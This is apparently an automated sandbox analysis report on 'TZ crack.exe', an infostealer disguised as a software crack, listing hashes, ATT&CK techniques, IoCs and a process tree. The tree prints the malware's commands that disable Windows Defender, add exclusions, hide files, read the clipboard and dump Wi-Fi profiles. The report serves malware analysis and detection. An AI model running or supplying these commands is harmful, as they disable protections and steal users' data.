b392615e4ed0b6b2115a488494bdbae407a065c61747a27f8fa014f1cfdf5d62

Analysis

max time kernel
149s
max time network
156s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
15/04/2025, 17:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

TZ crack.exe
Size

6.1MB
MD5

23f797a105666948bf4bddad600d0550
SHA1

22d7df6c24e5e1f4670a74a827019148e4f88cdd
SHA256

b392615e4ed0b6b2115a488494bdbae407a065c61747a27f8fa014f1cfdf5d62
SHA512

5514b35033ffef9d1470113ee3bac19bd906fcdb1695ef58ace13448fcee9f91c9a1d435a86d9626c714e9c4b25a4fbcb2d10b0a516d6b17c31219a73dfe8168
SSDEEP

196608:uWqF7K0veN/FJMIDJf0gsAGK4RPnAK+gcPTZ:sK0s/Fqyf0gstPAKs

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1636	powershell.exe
3232	powershell.exe
2940	powershell.exe
1424	powershell.exe
3108	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	TZ crack.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1768	cmd.exe
4336	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3420	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
2384	TZ crack.exe
2384	TZ crack.exe
2384	TZ crack.exe
2384	TZ crack.exe
2384	TZ crack.exe
2384	TZ crack.exe
2384	TZ crack.exe
2384	TZ crack.exe
2384	TZ crack.exe
2384	TZ crack.exe
2384	TZ crack.exe
2384	TZ crack.exe
2384	TZ crack.exe
2384	TZ crack.exe
2384	TZ crack.exe
2384	TZ crack.exe
2384	TZ crack.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
19	ip-api.com
25	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
2188	tasklist.exe
1752	tasklist.exe
4172	tasklist.exe
904	tasklist.exe
4660	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1840	cmd.exe

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000024219-21.dat	upx
behavioral1/memory/2384-25-0x00007FFC80D90000-0x00007FFC811FE000-memory.dmp	upx
behavioral1/files/0x000700000002420c-27.dat	upx
behavioral1/memory/2384-30-0x00007FFC82190000-0x00007FFC821B4000-memory.dmp	upx
behavioral1/files/0x0007000000024217-29.dat	upx
behavioral1/files/0x0007000000024213-47.dat	upx
behavioral1/memory/2384-50-0x00007FFC86CA0000-0x00007FFC86CB9000-memory.dmp	upx
behavioral1/files/0x000700000002420f-51.dat	upx
behavioral1/memory/2384-52-0x00007FFC81680000-0x00007FFC816AD000-memory.dmp	upx
behavioral1/files/0x000700000002420b-49.dat	upx
behavioral1/memory/2384-48-0x00007FFC89FD0000-0x00007FFC89FDF000-memory.dmp	upx
behavioral1/files/0x0007000000024212-46.dat	upx
behavioral1/files/0x0007000000024211-45.dat	upx
behavioral1/files/0x0007000000024210-44.dat	upx
behavioral1/files/0x000700000002420e-42.dat	upx
behavioral1/files/0x000700000002420d-41.dat	upx
behavioral1/files/0x000700000002421e-39.dat	upx
behavioral1/files/0x000700000002421d-38.dat	upx
behavioral1/files/0x000700000002421c-37.dat	upx
behavioral1/files/0x0007000000024218-34.dat	upx
behavioral1/files/0x0007000000024216-33.dat	upx
behavioral1/memory/2384-58-0x00007FFC812B0000-0x00007FFC812CF000-memory.dmp	upx
behavioral1/memory/2384-60-0x00007FFC72160000-0x00007FFC722D1000-memory.dmp	upx
behavioral1/memory/2384-66-0x00007FFC80AD0000-0x00007FFC80AFE000-memory.dmp	upx
behavioral1/memory/2384-65-0x00007FFC85640000-0x00007FFC8564D000-memory.dmp	upx
behavioral1/memory/2384-63-0x00007FFC81270000-0x00007FFC81289000-memory.dmp	upx
behavioral1/memory/2384-72-0x00007FFC71D20000-0x00007FFC72095000-memory.dmp	upx
behavioral1/memory/2384-71-0x00007FFC80D90000-0x00007FFC811FE000-memory.dmp	upx
behavioral1/memory/2384-68-0x00007FFC720A0000-0x00007FFC72158000-memory.dmp	upx
behavioral1/memory/2384-74-0x00007FFC82190000-0x00007FFC821B4000-memory.dmp	upx
behavioral1/memory/2384-78-0x00007FFC81740000-0x00007FFC8174D000-memory.dmp	upx
behavioral1/memory/2384-77-0x00007FFC81250000-0x00007FFC81264000-memory.dmp	upx
behavioral1/memory/2384-80-0x00007FFC71480000-0x00007FFC71598000-memory.dmp	upx
behavioral1/memory/2384-105-0x00007FFC812B0000-0x00007FFC812CF000-memory.dmp	upx
behavioral1/memory/2384-118-0x00007FFC72160000-0x00007FFC722D1000-memory.dmp	upx
behavioral1/memory/2384-176-0x00007FFC81270000-0x00007FFC81289000-memory.dmp	upx
behavioral1/memory/2384-214-0x00007FFC80AD0000-0x00007FFC80AFE000-memory.dmp	upx
behavioral1/memory/2384-270-0x00007FFC720A0000-0x00007FFC72158000-memory.dmp	upx
behavioral1/memory/2384-285-0x00007FFC71D20000-0x00007FFC72095000-memory.dmp	upx
behavioral1/memory/2384-323-0x00007FFC71480000-0x00007FFC71598000-memory.dmp	upx
behavioral1/memory/2384-315-0x00007FFC72160000-0x00007FFC722D1000-memory.dmp	upx
behavioral1/memory/2384-314-0x00007FFC812B0000-0x00007FFC812CF000-memory.dmp	upx
behavioral1/memory/2384-309-0x00007FFC80D90000-0x00007FFC811FE000-memory.dmp	upx
behavioral1/memory/2384-310-0x00007FFC82190000-0x00007FFC821B4000-memory.dmp	upx
behavioral1/memory/2384-347-0x00007FFC71D20000-0x00007FFC72095000-memory.dmp	upx
behavioral1/memory/2384-350-0x00007FFC71480000-0x00007FFC71598000-memory.dmp	upx
behavioral1/memory/2384-349-0x00007FFC81740000-0x00007FFC8174D000-memory.dmp	upx
behavioral1/memory/2384-348-0x00007FFC81250000-0x00007FFC81264000-memory.dmp	upx
behavioral1/memory/2384-361-0x00007FFC720A0000-0x00007FFC72158000-memory.dmp	upx
behavioral1/memory/2384-360-0x00007FFC85640000-0x00007FFC8564D000-memory.dmp	upx
behavioral1/memory/2384-359-0x00007FFC80AD0000-0x00007FFC80AFE000-memory.dmp	upx
behavioral1/memory/2384-358-0x00007FFC81270000-0x00007FFC81289000-memory.dmp	upx
behavioral1/memory/2384-356-0x00007FFC812B0000-0x00007FFC812CF000-memory.dmp	upx
behavioral1/memory/2384-355-0x00007FFC81680000-0x00007FFC816AD000-memory.dmp	upx
behavioral1/memory/2384-354-0x00007FFC86CA0000-0x00007FFC86CB9000-memory.dmp	upx
behavioral1/memory/2384-353-0x00007FFC89FD0000-0x00007FFC89FDF000-memory.dmp	upx
behavioral1/memory/2384-352-0x00007FFC82190000-0x00007FFC821B4000-memory.dmp	upx
behavioral1/memory/2384-351-0x00007FFC80D90000-0x00007FFC811FE000-memory.dmp	upx
behavioral1/memory/2384-357-0x00007FFC72160000-0x00007FFC722D1000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
452	cmd.exe
2940	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2112	cmd.exe
1828	netsh.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1240	WMIC.exe
3420	WMIC.exe
2940	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1044	systeminfo.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133892118053821783"	chrome.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2940	PING.EXE

Suspicious behavior: EnumeratesProcesses 30 IoCs

pid	Process
2940	powershell.exe
1424	powershell.exe
2940	powershell.exe
1424	powershell.exe
3108	powershell.exe
3108	powershell.exe
4336	powershell.exe
4336	powershell.exe
4336	powershell.exe
3196	powershell.exe
3196	powershell.exe
3196	powershell.exe
1636	powershell.exe
1636	powershell.exe
1636	powershell.exe
1508	powershell.exe
1508	powershell.exe
1508	powershell.exe
3232	powershell.exe
3232	powershell.exe
3232	powershell.exe
1068	powershell.exe
1068	powershell.exe
1068	powershell.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
3948	chrome.exe
3948	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4660	tasklist.exe
Token: SeDebugPrivilege	2940	powershell.exe
Token: SeDebugPrivilege	1424	powershell.exe
Token: SeIncreaseQuotaPrivilege	3208	WMIC.exe
Token: SeSecurityPrivilege	3208	WMIC.exe
Token: SeTakeOwnershipPrivilege	3208	WMIC.exe
Token: SeLoadDriverPrivilege	3208	WMIC.exe
Token: SeSystemProfilePrivilege	3208	WMIC.exe
Token: SeSystemtimePrivilege	3208	WMIC.exe
Token: SeProfSingleProcessPrivilege	3208	WMIC.exe
Token: SeIncBasePriorityPrivilege	3208	WMIC.exe
Token: SeCreatePagefilePrivilege	3208	WMIC.exe
Token: SeBackupPrivilege	3208	WMIC.exe
Token: SeRestorePrivilege	3208	WMIC.exe
Token: SeShutdownPrivilege	3208	WMIC.exe
Token: SeDebugPrivilege	3208	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3208	WMIC.exe
Token: SeRemoteShutdownPrivilege	3208	WMIC.exe
Token: SeUndockPrivilege	3208	WMIC.exe
Token: SeManageVolumePrivilege	3208	WMIC.exe
Token: 33	3208	WMIC.exe
Token: 34	3208	WMIC.exe
Token: 35	3208	WMIC.exe
Token: 36	3208	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3208	WMIC.exe
Token: SeSecurityPrivilege	3208	WMIC.exe
Token: SeTakeOwnershipPrivilege	3208	WMIC.exe
Token: SeLoadDriverPrivilege	3208	WMIC.exe
Token: SeSystemProfilePrivilege	3208	WMIC.exe
Token: SeSystemtimePrivilege	3208	WMIC.exe
Token: SeProfSingleProcessPrivilege	3208	WMIC.exe
Token: SeIncBasePriorityPrivilege	3208	WMIC.exe
Token: SeCreatePagefilePrivilege	3208	WMIC.exe
Token: SeBackupPrivilege	3208	WMIC.exe
Token: SeRestorePrivilege	3208	WMIC.exe
Token: SeShutdownPrivilege	3208	WMIC.exe
Token: SeDebugPrivilege	3208	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3208	WMIC.exe
Token: SeRemoteShutdownPrivilege	3208	WMIC.exe
Token: SeUndockPrivilege	3208	WMIC.exe
Token: SeManageVolumePrivilege	3208	WMIC.exe
Token: 33	3208	WMIC.exe
Token: 34	3208	WMIC.exe
Token: 35	3208	WMIC.exe
Token: 36	3208	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1240	WMIC.exe
Token: SeSecurityPrivilege	1240	WMIC.exe
Token: SeTakeOwnershipPrivilege	1240	WMIC.exe
Token: SeLoadDriverPrivilege	1240	WMIC.exe
Token: SeSystemProfilePrivilege	1240	WMIC.exe
Token: SeSystemtimePrivilege	1240	WMIC.exe
Token: SeProfSingleProcessPrivilege	1240	WMIC.exe
Token: SeIncBasePriorityPrivilege	1240	WMIC.exe
Token: SeCreatePagefilePrivilege	1240	WMIC.exe
Token: SeBackupPrivilege	1240	WMIC.exe
Token: SeRestorePrivilege	1240	WMIC.exe
Token: SeShutdownPrivilege	1240	WMIC.exe
Token: SeDebugPrivilege	1240	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1240	WMIC.exe
Token: SeRemoteShutdownPrivilege	1240	WMIC.exe
Token: SeUndockPrivilege	1240	WMIC.exe
Token: SeManageVolumePrivilege	1240	WMIC.exe
Token: 33	1240	WMIC.exe
Token: 34	1240	WMIC.exe

Suspicious use of FindShellTrayWindow 27 IoCs

pid	Process
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe
1508	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3104 wrote to memory of 2384	3104	TZ crack.exe	86
PID 3104 wrote to memory of 2384	3104	TZ crack.exe	86
PID 2384 wrote to memory of 448	2384	TZ crack.exe	87
PID 2384 wrote to memory of 448	2384	TZ crack.exe	87
PID 2384 wrote to memory of 1332	2384	TZ crack.exe	88
PID 2384 wrote to memory of 1332	2384	TZ crack.exe	88
PID 2384 wrote to memory of 2996	2384	TZ crack.exe	90
PID 2384 wrote to memory of 2996	2384	TZ crack.exe	90
PID 448 wrote to memory of 1424	448	cmd.exe	93
PID 448 wrote to memory of 1424	448	cmd.exe	93
PID 2996 wrote to memory of 4660	2996	cmd.exe	94
PID 2996 wrote to memory of 4660	2996	cmd.exe	94
PID 1332 wrote to memory of 2940	1332	cmd.exe	95
PID 1332 wrote to memory of 2940	1332	cmd.exe	95
PID 2384 wrote to memory of 4208	2384	TZ crack.exe	97
PID 2384 wrote to memory of 4208	2384	TZ crack.exe	97
PID 4208 wrote to memory of 3208	4208	cmd.exe	99
PID 4208 wrote to memory of 3208	4208	cmd.exe	99
PID 2384 wrote to memory of 3124	2384	TZ crack.exe	101
PID 2384 wrote to memory of 3124	2384	TZ crack.exe	101
PID 3124 wrote to memory of 3956	3124	cmd.exe	104
PID 3124 wrote to memory of 3956	3124	cmd.exe	104
PID 2384 wrote to memory of 916	2384	TZ crack.exe	172
PID 2384 wrote to memory of 916	2384	TZ crack.exe	172
PID 916 wrote to memory of 1032	916	cmd.exe	107
PID 916 wrote to memory of 1032	916	cmd.exe	107
PID 2384 wrote to memory of 4800	2384	TZ crack.exe	153
PID 2384 wrote to memory of 4800	2384	TZ crack.exe	153
PID 4800 wrote to memory of 1240	4800	cmd.exe	111
PID 4800 wrote to memory of 1240	4800	cmd.exe	111
PID 2384 wrote to memory of 2196	2384	TZ crack.exe	114
PID 2384 wrote to memory of 2196	2384	TZ crack.exe	114
PID 2196 wrote to memory of 3420	2196	cmd.exe	116
PID 2196 wrote to memory of 3420	2196	cmd.exe	116
PID 2384 wrote to memory of 1840	2384	TZ crack.exe	117
PID 2384 wrote to memory of 1840	2384	TZ crack.exe	117
PID 2384 wrote to memory of 4196	2384	TZ crack.exe	118
PID 2384 wrote to memory of 4196	2384	TZ crack.exe	118
PID 4196 wrote to memory of 3108	4196	cmd.exe	122
PID 4196 wrote to memory of 3108	4196	cmd.exe	122
PID 1840 wrote to memory of 1496	1840	cmd.exe	121
PID 1840 wrote to memory of 1496	1840	cmd.exe	121
PID 2384 wrote to memory of 388	2384	TZ crack.exe	123
PID 2384 wrote to memory of 388	2384	TZ crack.exe	123
PID 2384 wrote to memory of 4004	2384	TZ crack.exe	124
PID 2384 wrote to memory of 4004	2384	TZ crack.exe	124
PID 388 wrote to memory of 1752	388	cmd.exe	127
PID 388 wrote to memory of 1752	388	cmd.exe	127
PID 4004 wrote to memory of 2188	4004	cmd.exe	128
PID 4004 wrote to memory of 2188	4004	cmd.exe	128
PID 2384 wrote to memory of 3948	2384	TZ crack.exe	129
PID 2384 wrote to memory of 3948	2384	TZ crack.exe	129
PID 2384 wrote to memory of 848	2384	TZ crack.exe	132
PID 2384 wrote to memory of 848	2384	TZ crack.exe	132
PID 2384 wrote to memory of 1768	2384	TZ crack.exe	131
PID 2384 wrote to memory of 1768	2384	TZ crack.exe	131
PID 2384 wrote to memory of 1696	2384	TZ crack.exe	135
PID 2384 wrote to memory of 1696	2384	TZ crack.exe	135
PID 2384 wrote to memory of 2936	2384	TZ crack.exe	138
PID 2384 wrote to memory of 2936	2384	TZ crack.exe	138
PID 2384 wrote to memory of 2112	2384	TZ crack.exe	136
PID 2384 wrote to memory of 2112	2384	TZ crack.exe	136
PID 3948 wrote to memory of 3848	3948	cmd.exe	141
PID 3948 wrote to memory of 3848	3948	cmd.exe	141

Views/modifies file attributes 1 TTPs 3 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4200	attrib.exe
1496	attrib.exe
4564	attrib.exe

C:\Users\Admin\AppData\Local\Temp\TZ crack.exe
"C:\Users\Admin\AppData\Local\Temp\TZ crack.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3104
- C:\Users\Admin\AppData\Local\Temp\TZ crack.exe
  "C:\Users\Admin\AppData\Local\Temp\TZ crack.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\TZ crack.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:448
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\TZ crack.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1332
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2996
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4208
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3124
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:3956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:916
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:1032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4800
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:1240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2196
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\TZ crack.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:1840
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\TZ crack.exe"
      4⤵
      Views/modifies file attributes
      PID:1496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4196
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:388
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4004
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3948
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:3848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:1768
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:4336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:848
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1696
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:2112
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:2936
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:1044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:3608
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:4064
- - C:\Windows\system32\cmd.exe
